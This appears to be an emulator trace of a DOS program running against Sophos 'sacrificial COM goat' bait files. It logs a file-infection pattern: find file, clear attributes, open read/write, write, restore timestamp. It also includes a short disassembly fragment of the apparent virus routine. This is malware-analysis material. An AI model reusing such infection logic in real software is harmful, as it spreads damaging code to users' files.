2018-12-25T11:40:52.957341423Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.96713058Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.97399906Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.975296712Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.981580148Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.984038065Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.986202421Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.988838856Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.990564161Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.993158331Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.994580566Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:53.001640148Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:53.004058266Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:53.013475276Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:53.021251146Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:53.022636422Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:53.02879637Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:53.03082015Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:53.037693581Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:53.039884616Z 44 PC: 13e9f | Get time 0x13e9f: cmp dl, 2
0x13ea2: ja 0x13ea4
0x13ea4: mov dx, 0x80
0x13ea7: mov ah, 0x1a
0x13ea9: int 0x21
0x13eab: mov di, 0x100
0x13eae: push di
0x13eaf: ret
0x13eb0: lea dx, word ptr [bp + 0x215]
0x13eb4: mov ax, 0x4301
0x13eb7: xor cx, cx
0x13eb9: int 0x21
0x13ebb: mov ax, 0x3d02
0x13ebe: int 0x21
0x13ec0: jb 0x13f18
0x13ec2: xchg ax, bx
0x13ec3: mov ax, 0x5700
0x13ec6: int 0x21
0x13ec8: push cx
0x13ec9: push dx
2018-12-25T11:40:53.042375326Z 26 PC: 13eab | Set disk transfer address
2018-12-25T11:40:53.043322247Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T11:40:53.048518159Z 0 PC: 12a89 | Program terminate